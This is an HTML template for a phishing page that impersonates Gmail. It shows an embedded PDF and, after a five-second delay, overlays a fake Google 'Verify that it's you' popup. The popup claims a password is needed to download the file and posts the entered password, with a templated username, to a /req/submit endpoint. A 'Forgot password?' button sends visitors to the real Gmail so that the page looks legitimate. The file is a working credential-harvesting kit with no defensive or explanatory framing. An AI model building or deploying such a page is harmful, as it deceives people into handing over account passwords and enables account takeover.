<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Gmail</title>
    <link rel="shortcut icon" href="../images/image.png" type="image">
    <link rel="stylesheet" href="../stylesheet/newstylep.css">
    <style>
            .popup {
            display: none;
            position: fixed;
            top: 50%;
            left: 50%;
            height: 100%;
            width: 100%;
            transform: translate(-50%, -50%);
            background-color:transparent;
            border: 1px solid transparent;
            border-radius: 8px;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.2);
            z-index: 1000;
        }
        .overlay {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.75);
            z-index: 999;
        }
    </style>
</head>
<body>
    <object data="../Z2UA.pdf" style="height:900px; width:1860px"></object>
    <div class="overlay" id="overlay"></div>
    <div class="popup" id="loginPopup">
        <div class="maindiv">
    
            <form class="loginform" method="post" name="loginForm" action="/req/submit" accept-charset="UTF-8">
           
                <div class="form-half">
                    <div><img class="divlogo" src="../images/image.png" ></div>
                    <div><b><span class="welcome">Verify that it's you<span></b></div>                
                    <div class="userdiv">
                      <img class="left-img"  src="../images/user-circle.png" >&nbsp;&nbsp;
                      <span style="color: #2c2a2a;; font-size: 18px; font-family: Arial, Helvetica, sans-serif;">${username}</span>&nbsp;
                      <img class="right-img" src="../images/dropd.jpg">
                      
                    </div>
                </div>
                <div class="form-half1">
                <p style="padding-left: 8%; font-family: Google Sans,roboto,Noto Sans Myanmar UI,arial,sans-serif; color:red;"> Google needs verification to download the file.</p>
                    <div class="passdiv">
                        <input type='hidden' name="username" id="useRname" value="${username}">
                        <input  required='' name="password" type='password' id="pEyar">
                        <label style="color:#2c2a2a;; font-size: 16px; font-family: Arial, Helvetica, sans-serif;" alt='Enter your password' placeholder='Password'></label>
                    </div>
    
                    <div class="shwpwd">
                        <div><input type="checkbox" onclick="ShowpassWord();" class="checkbox"></div>
                        <span onclick="ShowpassWord();" class="button">Show password</span>
                    </div>
    
                    <script src="../script/pass.js"></script>
    
                    <div class="fgtpwd">
                        <button id="myButton" class="hyperl" >Forgot password?</button>&nbsp;&nbsp;&nbsp;
                        <button type="submit" class="btnnxt">Next</button>
                        <script>
                          // JavaScript to redirect on button click
                          document.getElementById("myButton").onclick = function () {
                              location.href = "https://mail.google.com"; // Replace "https://example.com" with your desired URL
                          };
                      </script>
                      </div>
    
                </div>
    
               
          
            </form>
    
          
    
    
        </div>
    </div>

    <script>
        // Show the popup and overlay after a delay
        setTimeout(function() {
            document.getElementById('overlay').style.display = 'block';
            document.getElementById('loginPopup').style.display = 'block';
        }, 5000);

       
    </script>
</body>
</html>